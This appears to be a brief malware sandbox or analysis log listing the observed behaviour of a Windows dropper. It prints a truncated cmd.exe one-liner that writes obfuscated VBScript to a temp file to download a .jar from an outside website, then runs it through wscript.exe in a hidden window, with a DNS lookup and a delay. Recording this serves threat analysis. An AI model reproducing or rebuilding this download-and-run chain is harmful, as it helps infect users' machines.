Technical Information
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @eCHo T3i= "http://www.chenesdor-provence.com/plugins/finder/ddf/files.jar">>G2u.VBS &@eCHo F1i = N7q("OST^5QHY")>>G2u.VBS &@eCHo Set X6p = CreateObject(N7q("TZ_TS95_TSO[[W")...
- %TEMP%\g2u.vbs
- %TEMP%\g2u.vbs
- DNS ASK ch#####or-provence.com
- '<SYSTEM32>\wscript.exe' "%TEMP%\G2u.VBS"
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @eCHo T3i= "http://www.chenesdor-provence.com/plugins/finder/ddf/files.jar">>G2u.VBS &@eCHo F1i = N7q("OST^5QHY")>>G2u.VBS &@eCHo Set X6p = CreateObject(N7q("TZ_TS95_TSO[[W")...' (with hidden window)
- '<SYSTEM32>\timeout.exe' 13